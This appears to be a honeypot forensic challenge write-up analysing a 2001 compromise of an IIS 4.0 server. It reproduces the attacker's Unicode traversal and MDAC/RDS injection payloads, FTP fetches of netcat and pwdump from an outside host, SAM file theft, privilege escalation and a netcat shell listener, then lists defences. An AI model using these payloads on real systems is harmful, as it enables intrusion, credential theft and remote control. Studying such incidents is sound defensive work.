Answers for scan 14


Tools Used to Analyze

  • Notepad for Windows and TextEdit for X-Windows. 
  • HexEdit for X-Windows; XVI32 was the hex editor of choice.

Which exploits were used to attack the system?

  • Extended Unicode Directory Traversal; Unicode Exploit
  • MDAC - RDS exploit
  • MSADC.PL was probably used to help with the above exploits --  !ADM!ROX!YOUR!WORLD! is the MIME separator string for this Perl script.
  • Windows NT FTP with the -s: option made FTP transfer trivial.

How were the exploits used to access and control the system?

  • Used the MSADC virtual directory path (one of many IIS defaults) with the unicode exploit to gain access to the winnt32 directory to execute shell commands via cmd.exe.  One reason to remove all virtual directories that are installed by default.
  • Used MSADCS.DLL exploit to execute shell commands on the server.
  • Used the RDS exploit to remotely upload/download files and execute shell commands from within an RDS query string

What was done once access was gained?

Note: The hacker made several typing errors which caused redundant yet incorrect syntax commands and are hopefully left out of this analysis.  The main problem I saw was trying to get the correct case for the unicode exploits. Which turned out to be lowercase (../..%c0%af../..) Using *NIX vs. DOS commands also added to this problem.

 

Most likely used MSADC.PL

GET /msadc/msadcs.dll HTTP/1.0 ----------------------------> Is the target vulnerable?   HTTP/1.0 is used here for GET and 1.1 for POST as in msadc.pl, also attacker uses 1.1 in his/her GET commands

HTTP/1.1 200 OK                                     
Server: Microsoft-IIS/4.0                             
Date: Sun, 04 Feb 2001 12:43:21 GMT        
                                                    -------------------------------> Yes!
Content-Type: application/x-varg
Content-Length: 6

POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1  ----------------------> Is RDS available/working?

User-Agent: ACTIVEDATA                                                                  -----------------------> Yes!
Host: lab.wiretrip.net
Content-Length: 645
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3 -------> MSADC.PL Mime coding.

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: 436

 

Test RDS by creating a file called fun and placing the text werd in it.

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c e c h o w e r d > > c : \ f u n " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ;

GET /guest/default.asp/..유../..유../..유../fun HTTP/1.1 -------------------------------------------> view the fun file

Copy Some Server Files

Move CMD.EXE

GET /msadc/..유../..유../..유../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1 ---> Copy cmd.exe to the directory hacker will be working from.

Rename Default.htm

copy default.htm default.html  --------------------------------------------------------> Upload own version of default.htm later.  

Re-write default.htm file ??? usually some type of defacement would occur here.

echo . >>default.htm ------------------> Attempt to overwrite the default.htm file with a . ?  Did not work because Hacker used the append operator. 

The default.htm page was viewed by a visitor from 213.46.45.28  using a GET with 1.0 just as the echo command was being called and got the current page.  The Attacker then issued a GET / with 1.1 command and the results were the same except for the . was added after the </HTML> tag and had no effect on the page.

Need some Hacking tools

Attacker successfully placed 3 files on the server from his/her FTP site:

pdump.exe --- I assume this is pwdump.exe because of the samdump.dll file also uploaded.  The directory listing shows 32,768 bytes which is the size of pwdump2 (actually the second version of pwdump2 which uses a new API call so the user does not need to pass the lsass.exe PID)

Netcat.exe --- Port redirector

Samdump.dll --- dll for injection from pwdump.exe.

Hacker had to try several times to compose correct FTP strings via echo commands redirected to a file.

The following files were created through a series of echo commands to send to the FTP program for automated execution.

  • SASFILE

  • FTPCOM

  • FTPCOM2

Using ftp with the -s:filename option executes the commands in the file allowing for easy FTP access.

Upload/Download of files via FTP

Uploaded Netcat.exe, Pdump.exe, and, Samdump.dll to web server.

FTP Execution String via RDS:

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c f t p - s : f t p c o m - n w w w . n e t h e r . n e t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : w i n n t h e l p i i s h t m t u t o r i a l b t c u s t m r . m d b ;

220 freenet.nether.net FTP server (SunOS 5.7) ready. -----------------------> FTP attempt to this site did not work using the ftpcom file; Incorrect login.

Attacker tried several RDS query strings without success.

Working FTP execution strings: 
 GET /msadc/../../../../../../program files/common files/system/msadc/

 cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

220-Serv-U FTP-Server v2.5h for WinSock ready...

220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
150 Opening ASCII mode data connection for pdump.exe (32768 bytes).
150 Opening ASCII mode data connection for samdump.dll (36864 bytes).
226 Transfer complete. -----------------------> 1 for each transfer/redundant
221 Buh bye, you secksi hax0r j00

Downloaded Whisker.tar.gz to attackers FTP site.

 GET /msadc/../../../../../../program files/common files/system/msadc/

 cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

220-Serv-U FTP-Server v2.5h for WinSock ready...

220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------

USER johna2k 
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,87
200 PORT Command successful.
STOR whisker.tar.gz
150 Opening ASCII mode data connection for whisker.tar.gz.
226 Transfer complete.
221 Buh bye, you secksi hax0r j00
Need to find some accounts and passwords

Tried to enumerate users and passwords with Password Dump (pdump.exe)

Using the RDS exploit, embedded the following command in a query string:  pdump.exe >> c:\yay.txt

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c C : \ P r o g r a m F i l e s \ C o m m o n F i l e s \ s y s t e m \ m s a d c \ p d u m p . e x e > > c : \ y a y . t x t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; 

c:\dir  ----------------------------------------------> did it work?

Volume in drive C has no label.
Volume Serial Number is 8403-6A0E

Directory of C:\

11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
11/26/00 12:34p 0 CONFIG.SYS
12/26/00 07:36p <DIR> exploits
02/04/01 06:26a 7 fun
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
12/21/00 08:59p <DIR> TEMP
02/04/01 06:42a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt -----------------------------------------------------------> did not work, no data.
14 File(s) 78,643,529 bytes
1,690,861,056 bytes free

c:\cat yay -------------------------------------------------------------------------------> not a *NIX box need to use the DOS TYPE command
The name specified is not recognized as an
internal or external command, operable program or batch file.

c:\type yay  -----------------------------------------------------------------------------> need .txt
The system cannot find the file specified.

Excuted NET User command to list users accounts on the server from the command line.

Ran RDS query to store NET Session in textfile yay2.txt.

02/04/01 06:46a 38 yay2.txt ---------------------------------------------------------> 38 bytes - size of standard no entries message

Type yay2.txt -- resulted in no entries in the list

c:\del yay2.txt -- attempt to delete the yay2 file

Ran command line net session into yay3.txt ----------------------------------------> access denied  current rights will not allow execution need to use RDS.

del yay3.txt -- attempt to delete the yay3 file

Enumerate users on the server via Net Users command and RDS.

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c n e t u s e r s > > h e h . t x t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ;

type heh.txt

User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest IUSR_KENNY 
IWAM_KENNY 
The command completed with one or more errors.

Attacker now knows what accounts are on the system.

Hacker tries adding the IIS default accounts to the admin group

NET GROUP command

Tried several times with the wrong syntax.

Why the IWAM account???

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c n e t l o c a l g r o u p D o m a i n A d m i n s I U S R _ K E N N Y / A D D " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ;

IUSR account!!!

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c n e t l o c a l g r o u p a d m i n i s t r a t o r s I U S R _ K E N N Y / A D D " ) | '  d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; 

NET LOCALGROUP - Command used to show users in groups.  Was Hacker successful? Yes

Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator Domain Admins IUSR_KENNY 
IWAM_KENNY 

The command completed successfully.

 

Time to try enumerating users and passwords from the SAM

type sam._
Access is denied.

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c r d i s k - s " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; 

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c r d i s k " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; 

Quit trying to create a repair disk on the local drive -- $$hive$$.tmp is now over 3MB

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c t y p e c : \ w i n n t \ r e p a i r \ s a m . _ > > c : \ h a r . t x t " ) | '  d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; 

Volume in drive C has no label.
Volume Serial Number is 8403-6A0E

Directory of C:\

11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
 11/26/00 12:34p  CONFIG.SYS
12/26/00 07:36p <DIR> exploits
02/04/01 07:07a 5,327 har.txt -------------------------------------------------------------> I've got a copy of the SAM
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
02/04/01 06:49a 69 README.NOW.Hax0r
12/21/00 08:59p <DIR> TEMP
02/04/01 07:05a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
15 File(s) 78,648,918 bytes
1,689,455,616 bytes free

Executed command type har.txt , was an actual SAM file.  ASCII text contained the standard MSFC code at the 

beginning of the file

copied har.txt to c:\inetpub\wwwroot.

Executed command GET har.txt HTTP/1.1 -- easy way to copy to a file on the hackers machine and run a crack program against it.

Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:11:28 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT
ETag: "5063fd6fab8ec01:b85"
Content-Length: 5327 ---------------------------------------> Same length as SAM.

Tried to delete the file har.txt

No success through the exploited command line.

S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c d e l c : \ i n e t p u b \ w w w r o o t \ h a r . t x t " ) | '  d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ;

Install NetCat (NC.exe)

  • GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1
  • First few attempts were incorrect with UPPERCASE C0 AF.
  • GET /msadc/..유../..유../..유../program files/common files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1
  • Installed NC to listen on port 6969 for a remote connection and upon successful connection -- return a command shell
  • -l -- causes netcat to listen
  • -p -- What port to listen on (6969)
  • -e -- What command to execute after connection (cmd.exe)

Miscellaneous Events

  • Listed Services with NET Start
  • These Windows NT services are started:

  • Alerter

  • Computer Browser

  • EventLog

  • FTP Publishing Service

  • IIS Admin Service

  • License Logging Service

  • Messenger

  • MSDTC

  • Net Logon

  • NT LM Security Support Provider

  • Plug and Play

  • Protected Storage

  • Remote Procedure Call (RPC) Locator

  • Remote Procedure Call (RPC) Service

  • Server

  • Spooler

  • TCP/IP NetBIOS Helper

  • Workstation

  • World Wide Web Publishing Service

  • The command completed successfully.

  • Hacker leaves a message in a file with the following command:  echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

How could this attack been prevented?

  • Delete \Program Files\Common Files\System\Msadc\msadcs.dll if not using RDS.
  • Patch the system.  IIS is known to be extremely buggy and patches and alerts are constantly updated. Subscribe to Listservs for current information.
  • Remove all sample files from any live server.  Sample files are not know for their security.
  • Remove the virtual directories created by default if not needed.  Unless your using database back-ends or remote administration etc., you can eliminate all default virtual directories.
  • Place root (wwwroot and ftproot) directories on separate drive/partition from system directories.
  • ACL and move critical / appropriate files.  Good old security through obscurity.
  • http://www.attrition.org/security/advisory/rfp/rfp.9907.msadcs -- All you ever wanted to know about this Exploit.

How much time did you spend on this analysis and write-up?

15-20 Hours

Do you feel the attacker in question knew if this was a honeypot?

Yes; echo best honeypot i've seen till now :) > rfp.txt